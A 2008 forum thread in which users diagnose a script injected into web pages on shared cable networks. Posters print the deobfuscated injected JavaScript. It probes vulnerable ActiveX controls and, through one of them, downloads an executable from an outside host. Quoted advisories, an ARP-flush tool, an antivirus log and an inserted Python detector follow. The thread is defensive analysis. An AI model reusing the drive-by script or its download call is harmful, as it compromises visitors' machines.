Re: Is my ISP injecting JS line ?
Posted: Thu Jan 17, 2008 4:53 pm
I'll bet there is just some cracker (negative hacker) out there reading this, and just laughing his head off.
A community of PHP developers offering assistance, advice, discussion, and friendship.
http://forums.devnetwork.net/
Everah wrote: How can an ISP not protect their equipment enough to allow something like this to happen?
First of all, most ISPs here provide internet through a local cable operator as a gateway and most of these gateways are on Windows - not Linux. And I won't be surprised if it's running on WinXP or Win2000. Linux at the local customer-level is still a long way.
chillpill_rohit wrote: and im a part of a local area network hosted by a local cable operator
From Nerul here and same setup - using Sify though.
chillpill_rohit wrote: ME and our cable operator had no clue that its such a big problem only after reading your blogs
I can never seem to talk to my cable operator in such depths. I can understand that he has no clue as to what's going on - because he keeps saying "??? ? ??? ?? ??? ?? ? ???? ???? ??? ??????"
chillpill_rohit wrote: 1. The net never disconnects at nite... arnd after 10pm till early in the morning arnd 8 or 9am when usually offices start...i got many office networks inside my local area network.
Not all the time - even at night I face same issues - guess some PC is still on at the time. But often I have noticed smooth connectivity during the night. But also a request timed out.
chillpill_rohit wrote: 2. Whenever net disconnects i ping to my gateway 172.25.0.1 and i get request timed out but thn at the same time if i ping to sum1 else on my network eg : 172.25.3.120 or 172.25.3.39 (rather they r dead or alive) my ping to gateway 172.25.0.1 immediately starts responding and the net starts working as normal........again if it gets disconnected i do the same procedure.......
This is news to me. Unfortunately I don't know any IPs in my network (it's going to be tedious to try all out)
Code: Select all
10.12.165.90 - - [14/Jan/2008:22:45:52 +0530] "OPTIONS / HTTP/1.1" 200 -
....
10.12.165.133 - - [15/Jan/2008:20:56:38 +0530] "OPTIONS / HTTP/1.1" 200 -
...
10.12.165.133 - - [18/Jan/2008:10:50:36 +0530] "OPTIONS / HTTP/1.1" 200 -
chillpill_rohit wrote: 3. I have observed tht whenever my net gets connected the first site i get redirected to is http://g.asdafdgfgf.com/ads.js which u all r talking abt....
Redirect? Are you sure? I never got redirected. All my pages got injected with that JS line on top and tried to pull that JS file first. I hope that's what you meant by redirect.
chillpill_rohit wrote: 2. Intrusion frm local network ... that is frm the PCs in my network which dont have proper antivirus and in which tht javascript is residing and continuously addressing the gateway 172.25.0.1 which we all share in our ip range......so the point is due such few infected PCs which i found are OFF during night time( when net works perfectly fine)......
This may be true, but because of the randomness, it's quite difficult to know. But what I don't understand is, how can a PC in the network send the html page to the gateway and then send it to the users. Shouldn't it be the other way round - gateway sends data to PCs and on the way one of the infected PCs injects that JS line to other destined PCs - I suck at networking, but I thought this was how point-to-point works.
chillpill_rohit wrote: but wat remains is the internal attack which still is cloggin the gateway .........to solve this we have asked all the users in my ip range to install Nod32 or Norton to secure there PCs so tht it doesnt allow such scripts to run on their PCs and congest the gateway...........
It's the firewall that's required more than the anti-virus. But most cost which ppl won't buy.
yochints wrote: if you clear the arp cache on your windows pc (by either repair or the arp -d * command) the network starts working.
Maybe it will help if you set a static ARP entry for your gateway IP.
yochints wrote: I got frustrated repairing the connection each and everytime ! .. so finally I have written a program to keep checking up the connection status every 30 seconds and repair it automatically if required ! .. now I don't need to do anything.. i have a log with disconnections every 10 minutes ..
Care to share that code?
Code: Select all
if (document.cookie.indexOf('OKSUN') == -1)
{
try
{
var e;
var ado = (document.createElement("object"));
ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as = ado.createobject("Adodb.Stream", "")
}
catch(e){};
finally
{
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
document.cookie = 'OKSUN=SUN;path=/;expires='+expires.toGMTString();
document.write("<\/script>");
if(e != "[object Error]")
{
document.write("<\/script>")
}
else
{
try
{
var f;
var storm = new ActiveXObject("MPS.StormPlayer")
}
catch(f){};
finally
{
if (f != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var g;
var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
}
catch(g){};
finally
{
if (g != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var h;
var thunder = new ActiveXObject("DPClient.Vod")
}
catch(h){};
finally
{
if (h != "[object Error]")
{
document.write("<\/script>");
document.write("")
}
}
try
{
var i;
var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
}
catch(i){};
finally
{
if (i != "[object Error]")
{
document.write("")
}
}
try
{
var j;
var obj = new ActiveXObject("BaiduBar.Tool")
}
catch(j){};
finally
{
if (j != "[object Error]")
{
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
document.write("")
}
}
if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
{
document.write("")
}
}
}
}
Code: Select all
var storm = new ActiveXObject("MPS.StormPlayer")
ZhenHan.Liu has discovered some vulnerabilities in Baofeng Storm, which can be exploited by malicious people to compromise a user's system.
1) A boundary error in sparser.dll can be exploited to cause a stack-based buffer overflow via e.g. an overly long (greater than 260 bytes) string passed as argument to the "rawParse()" and "advancedOpen()" methods and "URL" property within the MPS.StormPlayer.1 ActiveX control (mps.dll), or via a specially crafted .SMPL file containing an overly long (greater than 260 bytes) "path" string.
2) A boundary error within the MPS.StormPlayer.1 ActiveX control (mps.dll) when handling the "isDVDPath()" method can be exploited to cause a stack-based buffer overflow via an overly long (greater than 260 bytes) string passed as argument to the affected method.
3) Boundary errors within the MPS.StormPlayer.1 ActiveX control (mps.dll) when handling the "backImage()" and "titleImage()" properties can be exploited to cause heap-based buffer overflows by assigning an overly long (greater than 260 bytes) string to the affected properties.
Successful exploitation of the vulnerabilities allows execution of arbitrary code.
Related: xforce.iss.net, securityvulns.com
Code: Select all
var thunder = new ActiveXObject("DPClient.Vod")
7jdg has reported a vulnerability in Xunlei Thunder, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to a boundary error in the DPClient.Vod.1 ActiveX control (DapPlayer_Now.dll) when handling arguments passed to the "DownURL2()" method. This can be exploited to cause a buffer overflow by passing an overly long argument to the affected method.
Successful exploitation allows execution of arbitrary code.
The vulnerability is reported in version 5.6.9.344. Other versions may also be affected.
Code: Select all
var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
Some vulnerabilities have been discovered in Ourgame GLWorld, which can be exploited by malicious people to compromise a user's system.
The vulnerabilities are caused due to boundary errors within the GLCHAT.GLChatCtrl.1 ActiveX control (GLChat.ocx) when handling the "ConnectAndEnterRoom()" method. These can be exploited to cause stack-based buffer overflows by passing overly long arguments to the affected method.
Successful exploitation allows execution of arbitrary code.
The vulnerabilities are confirmed in version 2.7.0.8 including GLChat.ocx version 2.5.1.32. Other versions may also be affected.
The biggest threat is the BaiduBar.Tool ActiveXObject object because it tries to download an exe file.
Code: Select all
var obj = new ActiveXObject("BaiduBar.Tool")
obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
The MP3 search of Baidu has been criticized by the Office of the United States Trade Representative's Special 301 report by stating that “Baidu as the largest of an estimated seven or more China-based ‘MP3 search engines’ offering deep links to song files for downloads or streaming.”
That's probably why Baidu is used by many - download mp3s!
Merge9 wrote: I thought I could safely ignore this little piece of offending code as I had set the site in my host file to point to 127.0.0.1 and my virus software was dealing with it BUT adding that piece of code still affects 'some' pages I view but causing things like the font to be larger or some other formatting of the page error.
I thought it was CSS that wasn't getting parsed properly because of the missing JavaScript.
Merge9 wrote: Worse it must be getting added to even programs code that uses the net as one of my key programs that accesses an API does not work - it does work when I go through proxy with it.
Any clue if this is getting added to incoming bytes to ports other than 80? I am facing issues with FTP, SFTP quite often, but no clue if the JS line is getting injected in those requests too.
Merge9 wrote: So it seems the code is getting added from the server rather than my computer!!!! (this really is weird as I am the only computer on my network getting it and I am on a dynamically allocated IP from my wireless router). If this is so WHY am I the only one seems to be reporting this in the UK and on Virgin. Surely this would be more widespread.
That's the weirdest part - how come this is not common enough.
Merge9 wrote: Is there some way I can access the prerender engine of my browser and add some java script that removes the offending code before it renders??
AdBlock Plus extension for FireFox.
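To confirm that a script line is being added in transit rather than by the site, compare the page as received on the affected connection with a copy fetched over a path that bypasses the local gateway (the proxy route mentioned above). This is an added example, not code from any poster in the thread; the function names, `www.example.com`, `cdn.example.net` and both sample bodies are constructed, and only the `ads.js` URL comes from the thread.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _ScriptCollector(HTMLParser):
    """Record each external <script src=...> and whether it precedes the document start."""

    def __init__(self):
        super().__init__()
        self.scripts = []         # (src, line) in document order
        self.before_start = None  # number of scripts seen before <!DOCTYPE>/<html>

    def _mark_start(self):
        if self.before_start is None:
            self.before_start = len(self.scripts)

    def handle_decl(self, decl):
        if decl.lower().startswith("doctype"):
            self._mark_start()

    def handle_starttag(self, tag, attrs):
        if tag == "html":
            self._mark_start()
        elif tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append((src.strip(), self.getpos()[0]))


def external_scripts(body, page_url):
    """Return [(absolute_src, host, precedes_document_start, line)] for one response body."""
    parser = _ScriptCollector()
    parser.feed(body)
    parser.close()
    # A page with no <!DOCTYPE>/<html> at all gives no positional signal.
    early = parser.before_start or 0
    result = []
    for index, (src, line) in enumerate(parser.scripts):
        absolute = urljoin(page_url, src)
        result.append((absolute, urlparse(absolute).hostname or "", index < early, line))
    return result


def find_injected(received, page_url, reference=None, trusted_hosts=()):
    """List script tags in `received` that look added in transit.

    With a reference copy, anything the origin also serves is skipped.
    Without one, only the host allowlist and the tag position are used.
    """
    allowed = {urlparse(page_url).hostname, *trusted_hosts}
    known = None
    if reference is not None:
        known = {src for src, _, _, _ in external_scripts(reference, page_url)}
    findings = []
    for src, host, early, line in external_scripts(received, page_url):
        if known is not None and src in known:
            continue  # the origin serves this tag too
        reasons = []
        if known is not None:
            reasons.append("absent from reference copy")
        if host not in allowed:
            reasons.append("third-party host")
        if early:
            reasons.append("before document start")
        if reasons:
            findings.append({"src": src, "line": line, "reasons": reasons})
    return findings


# Constructed sample: the page as the origin serves it ...
PAGE_URL = "http://www.example.com/index.html"
REFERENCE = """<!DOCTYPE html>
<html><head><script src="/js/site.js"></script>
<script src="http://cdn.example.net/lib.js"></script></head>
<body><p>hello</p></body></html>
"""
# ... and as it arrives with the extra line on top, as described in the thread.
RECEIVED = '<script src="http://g.asdafdgfgf.com/ads.js"></script>\n' + REFERENCE

if __name__ == "__main__":
    for finding in find_injected(RECEIVED, PAGE_URL, reference=REFERENCE):
        print(finding["line"], finding["src"], "; ".join(finding["reasons"]))
```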
Code: Select all
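Public Class Form1
    ' Timer1 fires the connectivity check (every 30 seconds, per the post above).
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        test_and_login()
    End Sub

    ' Ping an outside host; on failure, flush the ARP cache and log the time.
    Private Sub test_and_login()
        Dim reachable As Boolean = False
        Try
            reachable = My.Computer.Network.Ping("www.google.com", 1000)
        Catch ex As Exception
            ' Ping throws when the name cannot be resolved or the network is down;
            ' treat that as a failed check instead of silently skipping the repair.
            reachable = False
        End Try

        If reachable Then
            Label4.Text = "Success"
        Else
            Label4.Text = "Failed"
            ' Drop all cached ARP entries, same as typing "arp -d *" by hand.
            Shell("arp -d *")
            TextBox1.Text = "Failed - " & Now & Environment.NewLine & TextBox1.Text
        End If
        Label2.Text = Now.ToString()
    End Sub
End Class
Code: Select all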
1/20/2008 5:53:47 PM Real-time file system protection file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:32:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:32:27 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 5:31:55 PM Real-time file system protection file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:28:21 PM Real-time file system protection file C:\WINDOWS\explorer.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\system32\drwtsn32.exe.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUP_CK.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:08 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\SETUPEX.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:06 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\INPAGE.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CRYPSERV.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKRFRESH.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:05 PM Real-time file system protection file D:\SOFTWARE\URDU 2000 2.4\INPAGE24\CKCONFIG.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:22:04 PM Real-time file system protection file D:\SOFTWARE\SONY\START.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:50 PM Real-time file system protection file D:\SOFTWARE\SONY\INSTALL\DASHBOARD\MSISETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:46 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-25\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:45 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DSS-20\FTDIUNIN.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\DRIVERS\DCU-11\UNINSTALLDRIVER.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:44 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\PHONE.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:42 PM Real-time file system protection file D:\SOFTWARE\SONY\CDBROWSER\BIN\DEMO32.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:32 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\PSA\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:21:30 PM Real-time file system protection file D:\SOFTWARE\SONY\APPLICATIONS\D2P\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:20:20 PM Real-time file system protection file D:\SOFTWARE\POWERDVD\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:56 PM Real-time file system protection file D:\SOFTWARE\OXFORD\QUICKFIND\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:42 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:19:39 PM Real-time file system protection file D:\SOFTWARE\NOKIA\SOFTWARE\LIFEBLOG\DIRECTX9\DXSETUP.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:18:00 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUPX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:59 PM Real-time file system protection file D:\SOFTWARE\NERO\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:50 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W9X\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:49 PM Real-time file system protection file D:\SOFTWARE\NERO\NEROVISION EXPRESS 3\NEROVISION\W2K\NEROVISION.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:17:37 PM Real-time file system protection file D:\SOFTWARE\NERO\NERO MEDIA PLAYER\SETUP.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:06:18 PM Real-time file system protection file D:\EXTRAS\SOMETHING\LOVEX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:05:54 PM Real-time file system protection file D:\CIES INTERNET\ANTI-VíRUS AVG 7.0 + SERIAL\AVG70F_148.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:04:51 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242074.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524427.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524401.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524400.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524392.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524398.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510607.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510608.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:00 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510603.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:00:26 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242078.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524445.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524446.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:37 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP119\A0510708.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:35 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP108\A0470803.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:52:45 PM Real-time file system protection file C:\WINDOWS\LINKINFO.dll Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Internet Explorer\iexplore.exe.
1/20/2008 4:45:30 PM Real-time file system protection file C:\WINDOWS\LINKINFO.DLL Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:44:52 PM Real-time file system protection file C:\Program Files\Internet Explorer\iexplore.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:55 PM Startup scanner file C:\WINDOWS\system32\msiexec.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\WINDOWS\system32\cqmjp.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:52 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\49400WO.DLL a variant of Win32/PSW.WOW.SV trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:48 PM Startup scanner file C:\WINDOWS\49400MM.DLL a variant of Win32/PSW.Legendmir.NFF trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:46 PM Startup scanner file C:\WINDOWS\49400WL.DLL Win32/PSW.Legendmir.NFN trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:45 PM Startup scanner file C:\WINDOWS\Explorer.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:44 PM Real-time file system protection file C:\WINDOWS\system32\taskmgr.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: \??\C:\WINDOWS\system32\winlogon.exe.
1/20/2008 4:41:41 PM Startup scanner file C:\WINDOWS\explorer.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\userinit.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\logon.scr Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:38 PM Startup scanner file C:\WINDOWS\system32\logonui.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\system32\rundll32.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
